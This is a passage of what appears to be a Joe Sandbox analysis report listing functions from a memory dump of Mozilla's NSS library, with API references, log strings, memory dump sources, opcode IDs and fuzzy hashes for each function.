                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
                                                                                                                                                                                                                                                            • API String ID: 632333372-648709467
                                                                                                                                                                                                                                                            • Opcode ID: bd2f19a4dce95c342753892e8ded10b12e664059c2f7b65cbc981c1c31e9f3a7
                                                                                                                                                                                                                                                            • Instruction ID: 72f7b3a6d971632b5df83d6bc678581fb07c54945d0da493ab953b6ea58f1903
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd2f19a4dce95c342753892e8ded10b12e664059c2f7b65cbc981c1c31e9f3a7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74110ABA740215ABDB04CF58DC95A56777AEB8A711B14407DED09C7710CB3AEC01CB91
                                                                                                                                                                                                                                                            Function 6BEAAB80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BEAAB8A
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE897,00000000), ref: 6BEAAC07
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BF6C2BF
                                                                                                                                                                                                                                                            • PR_LogPrint.NSS3(connect -> %d,00000000), ref: 6BEAAC1A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$ErrorPrint
                                                                                                                                                                                                                                                            • String ID: connect -> %d
                                                                                                                                                                                                                                                            • API String ID: 1784924131-3487059786
                                                                                                                                                                                                                                                            • Opcode ID: 874dd54b80fcb6e3fb713293ea28d8bda68ba6636821c093227f7f00d64008dc
                                                                                                                                                                                                                                                            • Instruction ID: cbbb528238509ed484b3f37377b6622460a0e5d13075669c5979966757e0084b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 874dd54b80fcb6e3fb713293ea28d8bda68ba6636821c093227f7f00d64008dc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD014E31A402045BF7006B38CC07BB93B6AEF42359F648578E8198F2B1E73D88908291
                                                                                                                                                                                                                                                            Function 6BFD2BE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3 ref: 6BFD2BFA
                                                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3 ref: 6BFD2C2B
                                                                                                                                                                                                                                                            • PR_LogPrint.NSS3(%s incr => %d (for %s),?,?,?), ref: 6BFD2C5D
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Monitor$EnterExitPrint
                                                                                                                                                                                                                                                            • String ID: %s incr => %d (for %s)
                                                                                                                                                                                                                                                            • API String ID: 2736670396-2912983388
                                                                                                                                                                                                                                                            • Opcode ID: 6a6c6e00349e9df0b19c76a268c124c0909b6dc752276b2a0f2fe504d99dd0a8
                                                                                                                                                                                                                                                            • Instruction ID: 70146bb1549c4e9a76152c2c549e7db1bfa78aa7a16c5a951247a1236b2130ef
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a6c6e00349e9df0b19c76a268c124c0909b6dc752276b2a0f2fe504d99dd0a8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF01D873B00110AFEB119F25DD45A0B77B9EB45728B588469D80997722EF3AEC44C7D1
                                                                                                                                                                                                                                                            Function 6BE4A8E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 6BF7A480: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6BF9C3A2,?,?,00000000,00000000), ref: 6BF7A528
                                                                                                                                                                                                                                                              • Part of subcall function 6BF7A480: sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6BF7A6E0
                                                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014576,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6BE4A94F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • database corruption, xrefs: 6BE4A943
                                                                                                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6BE4A948
                                                                                                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6BE4A939
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                            • API String ID: 491875419-598938438
                                                                                                                                                                                                                                                            • Opcode ID: d02717aa5a436465e3b6c3abae91ba004cbf65485951cdd0c2a9d71c00578006
                                                                                                                                                                                                                                                            • Instruction ID: a63669783692ffaa3895c0197be0e0dce6628342ed815f6f4aacdd15a13c2125
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d02717aa5a436465e3b6c3abae91ba004cbf65485951cdd0c2a9d71c00578006
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3014932F40208ABD7108B79FC06B5BB7F9AF48318F52487DEA495B651D73AE805C7A1
                                                                                                                                                                                                                                                            Function 6BED98B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,6BEE4B4C,?,00000000,?,?,6BEE4C51), ref: 6BED98CE
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,6BEE4B4C,?,00000000,?,?,6BEE4C51), ref: 6BED98E3
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,6BEE4B4C,?,00000000,?,?,6BEE4C51), ref: 6BED9903
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalEnterSectionUnlockValue
                                                                                                                                                                                                                                                            • String ID: LKk
                                                                                                                                                                                                                                                            • API String ID: 1419708843-762217098
                                                                                                                                                                                                                                                            • Opcode ID: 9c8159b7eebe2d5b6ace26df20ff8bde60e279149fd52ec98c04c35bfb11fb48
                                                                                                                                                                                                                                                            • Instruction ID: 3820810afad131390ba0f3ab0edf037496d02a5c24bbebde840dd343b2e3f005
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c8159b7eebe2d5b6ace26df20ff8bde60e279149fd52ec98c04c35bfb11fb48
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11018F797006059BDB00BF79C88556AFBB8FF45618F108A69DCA887301EB34E9928BC1
                                                                                                                                                                                                                                                            Function 6BEA39C0 Relevance: 6.5, APIs: 1, Strings: 3, Instructions: 464COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6BEA3CA4
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                                                                            • String ID: Oak$Oak$Oak
                                                                                                                                                                                                                                                            • API String ID: 2221118986-2423879147
                                                                                                                                                                                                                                                            • Opcode ID: 1faf3d44e0f50c5609e8b9dbf5cc3f3e96f180045510ecdd6b89686336c73e2f
                                                                                                                                                                                                                                                            • Instruction ID: 89a8610e19aa34ea340c26e1ab5afd550775e2332478e8fe97ae191be9685800
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1faf3d44e0f50c5609e8b9dbf5cc3f3e96f180045510ecdd6b89686336c73e2f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19120B75E002199FCB14CF58D890AAEBBF6FF88304F248169E815AB752D735AD52CB90
                                                                                                                                                                                                                                                            Function 6BEBC9B0 Relevance: 6.1, APIs: 4, Instructions: 128stringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: sqlite3_freesqlite3_mprintfsqlite3_result_error_nomemstrlen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1052848593-0
                                                                                                                                                                                                                                                            • Opcode ID: ab7a90125e9822a3830465eb29b0f9cdd157a44e13d682fef23675404742c77b
                                                                                                                                                                                                                                                            • Instruction ID: ad6c7259e579e0dd6270d0ccfb5bfa98d38b5ff73699e21065f066a53c102e39
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab7a90125e9822a3830465eb29b0f9cdd157a44e13d682fef23675404742c77b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1051C232A1CB458AC711DF34C54022FF7F1BF86798F208A5DE8966A260EB39C495C782
                                                                                                                                                                                                                                                            Function 6BEA9980 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE89F,00000000,?,?,?,?,?,6BEA996F,?,00000001,00000000), ref: 6BEA9A3A
                                                                                                                                                                                                                                                            • PR_CallOnce.NSS3(6C0214E4,6BF8CC70,?,?,?,?,?,6BEA996F,?,00000001,00000000), ref: 6BEA9A50
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE890,00000000), ref: 6BEA9A81
                                                                                                                                                                                                                                                            • _pr_push_ipv6toipv4_layer.NSS3(00000000), ref: 6BEA9A97
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Error$CallOnce_pr_push_ipv6toipv4_layer
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 329733494-0
                                                                                                                                                                                                                                                            • Opcode ID: 640a6f1429b2139c4435777e311d800cbed42f38922726fcb27d8e8b5fd5a436
                                                                                                                                                                                                                                                            • Instruction ID: 439742ca0bc9b162a89264c3c66c95c8ff5bd86a3031e993693e6505f5eb4ee2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 640a6f1429b2139c4435777e311d800cbed42f38922726fcb27d8e8b5fd5a436
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1931D579B042016FDB108A78DC85B2D77E8AB86318F34452AE81ADB792E73EDC51C791
                                                                                                                                                                                                                                                            Function 6BF8AAA2 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C020D9C,00000000), ref: 6BF8AAD4
                                                                                                                                                                                                                                                            • _initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C020DA8,00000000), ref: 6BF8AAE3
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _initialize_onexit_table
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2450287516-0
                                                                                                                                                                                                                                                            • Opcode ID: fac5361d1484b671dfa129d146d7e940c19340bb3012d885bbbf6b6db677e840
                                                                                                                                                                                                                                                            • Instruction ID: cf358f62173fa3dec11418cbe090c633b2fc0583b5310bc65e94cff9a8bb4123
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fac5361d1484b671dfa129d146d7e940c19340bb3012d885bbbf6b6db677e840
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C221B073D04649ABDF01DF78D90168EBBF6DF02318F104055ED24AB5A0DB7AE9418BA1
                                                                                                                                                                                                                                                            Function 6BF15AF0 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BF15B0F
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BF15B23
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6BF15B80
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BF15B8E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 284873373-0
                                                                                                                                                                                                                                                            • Opcode ID: 1aa2655f0925c50a9994389c1970b2e5f4eb4caef6ec9061a2198cffa5b7216d
                                                                                                                                                                                                                                                            • Instruction ID: 6f48f7b13c07f7edbea14f168f0e0bd916704ff79049a8435c997290b20d5d8e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1aa2655f0925c50a9994389c1970b2e5f4eb4caef6ec9061a2198cffa5b7216d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32213673E04205AFEB009BB8DC86B5AB778BF05324F144925EE059B261FB39E950C7E1
                                                                                                                                                                                                                                                            Function 6BF6A8F0 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6BF52AE9,00000000,0000065C), ref: 6BF6A91D
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0ADC0: TlsGetValue.KERNEL32(?,6BEECDBB,?,6BEED079,00000000,00000001), ref: 6BF0AE10
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0ADC0: EnterCriticalSection.KERNEL32(?,?,6BEECDBB,?,6BEED079,00000000,00000001), ref: 6BF0AE24
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6BEED079,00000000,00000001), ref: 6BF0AE5A
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6BEECDBB,?,6BEED079,00000000,00000001), ref: 6BF0AE6F
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6BEECDBB,?,6BEED079,00000000,00000001), ref: 6BF0AE7F
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0ADC0: TlsGetValue.KERNEL32(?,6BEECDBB,?,6BEED079,00000000,00000001), ref: 6BF0AEB1
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6BEECDBB,?,6BEED079,00000000,00000001), ref: 6BF0AEC9
                                                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6BF52AE9,00000000,0000065C), ref: 6BF6A934
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00068C9A,00000000,00000000,00000000,?,?,6BF52AE9,00000000,0000065C), ref: 6BF6A949
                                                                                                                                                                                                                                                            • free.MOZGLUE(00068C86,00000000,0000065C), ref: 6BF6A952
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1595327144-0
                                                                                                                                                                                                                                                            • Opcode ID: 568ad564b0f1107f0992e7d1310f236671bd2a17354bc184e4b07e2d31419480
                                                                                                                                                                                                                                                            • Instruction ID: 278f6fd421a5ba44917e2e99733897390cce446f095db665a1c9a9859ab0f123
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 568ad564b0f1107f0992e7d1310f236671bd2a17354bc184e4b07e2d31419480
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 813119B6601211DFD704CF24D990E62B7F8FF48354B1581A9EC198B366E734E911CBA1
                                                                                                                                                                                                                                                            Function 6BF0BA00 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
